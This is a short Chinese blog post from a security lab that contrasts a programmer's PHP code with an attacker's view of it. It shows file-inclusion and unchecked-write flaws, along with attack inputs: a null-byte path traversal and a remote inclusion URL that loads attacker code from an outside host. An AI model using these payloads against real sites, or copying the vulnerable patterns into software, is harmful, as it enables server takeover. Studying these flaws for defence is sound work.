http://hi.baidu.com/micropoor
|
//2011-11-19 星期六
//程序员的思维
//Micropoor.php代码片段
<?php
//略
$modd=$_GET[mod];
… if(!$tpl->isCached(INDEX_TEMPLATE."product_".$modd.".".$tplext,$cacheid)){
require_once './source/module/$modd.php';
//略
}
//我们的思维
index.php?mod=../../1.php%00
//其他条件
php.ini
allow_url_fopen=on
//我们的思维
index.php?mod=http://hi.baidu.com/micropoor//att.php%00
//程序员的思维
//Micropoor.php代码片段
<?php
$file=file_get_contents($url);
$newfile=fopen('Index.htm','w');
fwrite($newfile,$file);
fclose($newfile);
?>
//我们的思维
控制$url变量,写入任意代码进index.htm
$url变量假如不可控制
利用第三方网站 |
结论:控制住一切可能控制的变量
文章作者
Nuclear'Atk
上次更新
2011-11-20
许可协议
Nuclear'Atk(核攻击)网络安全实验室版权所有,转载请注明出处。